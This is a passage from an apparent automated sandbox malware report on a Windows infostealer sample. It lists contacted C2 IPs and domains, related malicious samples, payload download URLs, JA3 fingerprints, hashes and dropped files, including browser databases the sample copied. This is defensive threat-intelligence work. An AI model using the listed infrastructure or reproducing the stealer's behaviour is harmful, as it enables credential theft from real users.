https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199747278259/inventory/	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	Avira URL Cloud: malware	unknown
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	build_2024-07-25_20-56.exe, 0000000A.00000002.3367211435.0000000019990000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3363786257.000000001907F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.92.250.213	unknown	Bulgaria	34368	THEZONEBG	false
198.46.178.145	unknown	United States	36352	AS-COLOCROSSINGUS	false
77.91.101.71	arpdabl.zapto.org	Russian Federation	42861	FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU	false
5.75.212.60	unknown	Germany	24940	HETZNER-ASDE	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
23.192.247.89	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
104.21.72.79	vaniloin.fun	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1482971
Start date and time:	2024-07-26 12:55:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	IRqsWvBBMc.exe renamed because original name is a hash value
Original Sample Name:	78343efcb6f731cd7668e648ed73e40f.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/30@5/7
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 51% Number of executed functions: 117 Number of non-executed functions: 184
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target IRqsWvBBMc.exe, PID 2544 because it is empty
Execution Graph export aborted for target axplong.exe, PID 1492 because there are no executed function
Execution Graph export aborted for target axplong.exe, PID 4600 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
06:57:01	API Interceptor	88233x Sleep call for process: axplong.exe modified
06:57:19	API Interceptor	1x Sleep call for process: build_2024-07-25_20-56.exe modified
06:57:20	API Interceptor	11x Sleep call for process: server.exe modified
12:56:01	Task Scheduler	Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.92.250.213	file.exe	Get hash	malicious	Vidar	Browse
198.46.178.145	file.exe	Get hash	malicious	Vidar	Browse	198.46.178.145/7847438767.exe
	c2Rx7Hv3K2.rtf	Get hash	malicious	Unknown	Browse	198.46.178.145/40/vbc.exe
	l5K5Z1U3Le.rtf	Get hash	malicious	Unknown	Browse	198.46.178.145/40/vbc.exe
	YcOszE4byW.rtf	Get hash	malicious	Unknown	Browse	198.46.178.145/50/vbc.exe
	hN73g2fwk2.rtf	Get hash	malicious	AgentTesla	Browse	198.46.178.145/38/vbc.exe
77.91.101.71	file.exe	Get hash	malicious	Vidar	Browse	arpdabl.zapto.org/
	Bootstrapper.exe	Get hash	malicious	Hancitor, Vidar	Browse	arpdabl.zapto.org/
	Setup .exe	Get hash	malicious	Go Injector, MicroClip, Vidar, Xmrig	Browse	arpdabl.zapto.org/
	subsoft.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	arpdabl.zapto.org/
	hOYGfIcBVf.exe	Get hash	malicious	LummaC, Vidar	Browse	arpdabl.zapto.org/
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	arpdabl.zapto.org/
	MN3OAv98T9.exe	Get hash	malicious	LummaC, Vidar	Browse	arpdabl.zapto.org/
	file.exe	Get hash	malicious	Vidar	Browse	arpdabl.zapto.org/
	file.exe	Get hash	malicious	LummaC, Amadey, Babadeda, LummaC Stealer, PureLog Stealer, RedLine, Stealc	Browse	arpdabl.zapto.org/
	file.exe	Get hash	malicious	Vidar	Browse	arpdabl.zapto.org/
5.75.212.60	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	Setup .exe	Get hash	malicious	Go Injector, MicroClip, Vidar, Xmrig	Browse
185.215.113.16	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php
	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php
	PE1dBCFKZv.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	random.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
steamcommunity.com	file.exe	Get hash	malicious	Vidar	Browse	23.192.247.89
	file.exe	Get hash	malicious	Vidar	Browse	23.192.247.89
	LisectAVT_2403002B_272.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	23.192.247.89
	LisectAVT_2403002B_344.exe	Get hash	malicious	Bdaejec, Vidar	Browse	23.207.106.113
	LisectAVT_2403002C_60.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	23.199.218.33
	LisectAVT_2403002C_67.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	23.199.218.33
	LisectAVT_2403002C_81.exe	Get hash	malicious	Vidar	Browse	23.197.127.21
	35fcdf3a.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	23.192.247.89
	Setup .exe	Get hash	malicious	Go Injector, MicroClip, Vidar, Xmrig	Browse	23.192.247.89
	subsoft.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	23.197.127.21
vaniloin.fun	file.exe	Get hash	malicious	Unknown	Browse	104.21.72.79
	file.exe	Get hash	malicious	Unknown	Browse	104.21.72.79
	N4HEBe8AaW.exe	Get hash	malicious	Unknown	Browse	172.67.177.136
	N4HEBe8AaW.exe	Get hash	malicious	Unknown	Browse	172.67.177.136
	tOPsLIbzyD.exe	Get hash	malicious	Unknown	Browse	104.21.72.79
arpdabl.zapto.org	file.exe	Get hash	malicious	Vidar	Browse	77.91.101.71
	file.exe	Get hash	malicious	Vidar	Browse	77.91.101.71
	Bootstrapper.exe	Get hash	malicious	Hancitor, Vidar	Browse	77.91.101.71
	Setup .exe	Get hash	malicious	Go Injector, MicroClip, Vidar, Xmrig	Browse	77.91.101.71
	subsoft.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	77.91.101.71
	hOYGfIcBVf.exe	Get hash	malicious	LummaC, Vidar	Browse	77.91.101.71
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	77.91.101.71
	MN3OAv98T9.exe	Get hash	malicious	LummaC, Vidar	Browse	77.91.101.71
	file.exe	Get hash	malicious	Vidar	Browse	77.91.101.71
	file.exe	Get hash	malicious	LummaC, Amadey, Babadeda, LummaC Stealer, PureLog Stealer, RedLine, Stealc	Browse	77.91.101.71

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
THEZONEBG	file.exe	Get hash	malicious	Vidar	Browse	91.92.250.213
	Quotation.xls	Get hash	malicious	Remcos	Browse	91.92.245.100
	LisectAVT_2403002A_62.exe	Get hash	malicious	RedLine	Browse	91.92.248.117
	LisectAVT_2403002A_97.exe	Get hash	malicious	DarkVision Rat	Browse	91.92.244.17
	67#U2464.hta	Get hash	malicious	Unknown	Browse	91.92.244.191
	LisectAVT_2403002B_73.exe	Get hash	malicious	Xmrig	Browse	91.92.248.9
	IJ8PamwVuJ.exe	Get hash	malicious	Xmrig	Browse	91.92.248.9
	https://ffb-bk.com?id=0119818877107560047	Get hash	malicious	Unknown	Browse	91.92.251.205
	cLPbKg0oEK.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	91.92.244.238
	July17_Payment43TR_D0812_U48927_H09824_W3892_K5087_F5902_DU8927_R491.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	91.92.255.36
AS-COLOCROSSINGUS	file.exe	Get hash	malicious	Vidar	Browse	198.46.178.145
	C1ZsNxSer8.exe	Get hash	malicious	Remcos	Browse	23.95.60.82
	Quotation.xls	Get hash	malicious	Remcos	Browse	23.95.60.82
	#U00d6DEME TAVS#U0130YES#U0130.xls	Get hash	malicious	Remcos	Browse	198.46.176.133
	BilseMHALF.rtf	Get hash	malicious	Unknown	Browse	172.245.123.11
	2FBexXRCHR.rtf	Get hash	malicious	AgentTesla	Browse	198.46.174.139
	DBytisGNuD.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	107.174.69.116
	LisectAVT_2403002A_101.exe	Get hash	malicious	Remcos	Browse	107.175.229.139
	LisectAVT_2403002A_111.exe	Get hash	malicious	Trickbot	Browse	108.174.60.238
	042240724.xls	Get hash	malicious	Remcos	Browse	198.46.176.133
HETZNER-ASDE	file.exe	Get hash	malicious	Vidar	Browse	5.75.212.60
	file.exe	Get hash	malicious	Vidar	Browse	5.75.212.60
	A9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	188.40.141.211
	C0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exe	Get hash	malicious	Bdaejec, BitCoin Miner, Xmrig	Browse	159.69.71.228
	be1c79275d836696a00b258d15a8b337a8c9beb8198a5bd3d5aaf64d660c8005_dump.exe	Get hash	malicious	SmokeLoader	Browse	188.40.141.211
	EF2D1DE8BE7B216F6983BD43D120B512A0917EBE887F30D256ECA8395CE613CC.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	188.40.141.211
	Endermanch@MEMZ.exe	Get hash	malicious	Bdaejec, KillMBR	Browse	116.202.167.133
	file.exe	Get hash	malicious	SystemBC	Browse	135.181.90.229
	file.exe	Get hash	malicious	SystemBC	Browse	159.69.28.147
	http://appinforyvjhf6454ms1a.pages.dev/	Get hash	malicious	TechSupportScam	Browse	195.201.57.90
FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU	file.exe	Get hash	malicious	Vidar	Browse	77.91.101.71
	Bootstrapper.exe	Get hash	malicious	Hancitor, Vidar	Browse	77.91.101.71
	Setup .exe	Get hash	malicious	Go Injector, MicroClip, Vidar, Xmrig	Browse	77.91.101.71
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	77.91.77.82
	Nin6JE44ky.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	77.91.77.82
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	77.91.77.82
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar, Xmrig	Browse	77.91.77.82
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar, Xmrig	Browse	77.91.77.82
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	77.91.77.82
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	77.91.77.82

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
51c64c77e60f3980eea90869b68c58a8	file.exe	Get hash	malicious	Vidar	Browse	5.75.212.60
	yINa8PjdSm.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	5.75.212.60
	DDPciclShm.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	5.75.212.60
	uUW3k0UzfV.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	5.75.212.60
	yINa8PjdSm.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	5.75.212.60
	DDPciclShm.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	5.75.212.60
	uUW3k0UzfV.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	5.75.212.60
	file.exe	Get hash	malicious	Vidar	Browse	5.75.212.60
	LisectAVT_2403002B_159.dll	Get hash	malicious	Dridex Dropper	Browse	5.75.212.60
	LisectAVT_2403002B_218.exe	Get hash	malicious	Unknown	Browse	5.75.212.60
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	Unknown	Browse	104.21.72.79
	file.exe	Get hash	malicious	Unknown	Browse	104.21.72.79
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	104.21.72.79
	QMe7JpPtde.exe	Get hash	malicious	Unknown	Browse	104.21.72.79
	TBw6qwEBHZ.exe	Get hash	malicious	BlackMoon, Neshta, XRed	Browse	104.21.72.79
	C0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exe	Get hash	malicious	Bdaejec, BitCoin Miner, Xmrig	Browse	104.21.72.79
	imT9J3SEaZ.exe	Get hash	malicious	Unknown	Browse	104.21.72.79
	FEB32B614BC7F38CC0B553B5FEE80B7E68AD8AE78DF1F1CAE4016A5AA1C4677A.exe	Get hash	malicious	Bdaejec	Browse	104.21.72.79
	LisectAVT_2403002A_156.exe	Get hash	malicious	XRed	Browse	104.21.72.79
	LisectAVT_2403002A_160.exe	Get hash	malicious	Gh0stCringe, GhostRat, Mimikatz, RunningRAT, XRed	Browse	104.21.72.79
37f463bf4616ecd445d4a1937da06e19	88z6JBPo00.exe	Get hash	malicious	Unknown	Browse	23.192.247.89
	fJDG7S5OD7.exe	Get hash	malicious	Unknown	Browse	23.192.247.89
	Ku8UpPuzaa.exe	Get hash	malicious	Unknown	Browse	23.192.247.89
	BvPEdRRQNz.exe	Get hash	malicious	Unknown	Browse	23.192.247.89
	uTQkPZ9odT.exe	Get hash	malicious	Unknown	Browse	23.192.247.89
	DOtQyvB2DJ.exe	Get hash	malicious	TrojanRansom	Browse	23.192.247.89
	RlPKbGYzSn.exe	Get hash	malicious	Unknown	Browse	23.192.247.89
	pVwINBeQe5.exe	Get hash	malicious	Unknown	Browse	23.192.247.89
	1rDQQ8UfnR.exe	Get hash	malicious	Unknown	Browse	23.192.247.89
	JQDIFqQIma.exe	Get hash	malicious	Unknown	Browse	23.192.247.89

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse
	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Python Stealer, Amadey, Babadeda, Monster Stealer, RedLine, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	Bootstrapper.exe	Get hash	malicious	Hancitor, Vidar	Browse
	azeyNF3kkf.exe	Get hash	malicious	Stealc, Vidar	Browse
	Setup .exe	Get hash	malicious	Go Injector, MicroClip, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse
	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Python Stealer, Amadey, Babadeda, Monster Stealer, RedLine, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	Bootstrapper.exe	Get hash	malicious	Hancitor, Vidar	Browse
	azeyNF3kkf.exe	Get hash	malicious	Stealc, Vidar	Browse
	Setup .exe	Get hash	malicious	Go Injector, MicroClip, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\CFHIIJDBKE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12016128
Entropy (8bit):	6.075183250085094
Encrypted:	false
SSDEEP:	49152:h3FUhq8uEA5Cu+Ng9hxWpZdESPzNHk8aPu9ipJY0/CcjaChdReYEk8fSj+TBmkOv://CvGkk+8qc8On18iiDoA1PdxGdQI
MD5:	190E4ED7759276E78D16398673996B2B
SHA1:	CE5BB936AB809356D5B0BC29B6BE2E0D07D3DC0A
SHA-256:	D4E965DEAAAA9D84359FBCE89A2CB1966BCA6BF525DF8BBFB1AD9ED08DF1DAAD
SHA-512:	99CF79ABA0AFC528341C3EF474BA4AB71E50FAF497536E74F8D985C39E85D5E145FB86262BAC3E95E4C7752C3C0294751D4A988C2F4FBE5BCFCD3C6D19EF9C70
Malicious:	true
Reputation:	low
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d....r.f.........."..........+..............@.....................................................@............... ...............`.......`.."P.............................................................(....................t...............................text...0.......................... ..`.data....}.......~.................@....bss....,....`...........................idata.."P...`...R...D..............@....didata.............................@....edata.......`.......(..............@..@.tls.........p...........................rdata..m............*..............@..@.reloc...............,..............@..B.pdata..............................@..@.rsrc...............v..............@..@....................Z..............@..@

C:\ProgramData\KFCFBFHIEBKJ\AFBKKF

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFCFBFHIEBKJ\CAAAFC

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8508558324143882
Encrypted:	false
SSDEEP:	24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
MD5:	933D6D14518371B212F36C3835794D75
SHA1:	92D056D912B3C0260D379330D3CC0359B57A322B
SHA-256:	55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
SHA-512:	EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFCFBFHIEBKJ\EHDBGD

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFCFBFHIEBKJ\EHDBGD-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFCFBFHIEBKJ\FBGHII

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8745947603342119
Encrypted:	false
SSDEEP:	96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
MD5:	378391FDB591852E472D99DC4BF837DA
SHA1:	10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
SHA-256:	513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
SHA-512:	F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFCFBFHIEBKJ\GHJKEH

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFCFBFHIEBKJ\HJDBAF

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFCFBFHIEBKJ\HJEBGH

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFCFBFHIEBKJ\IECGIE

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
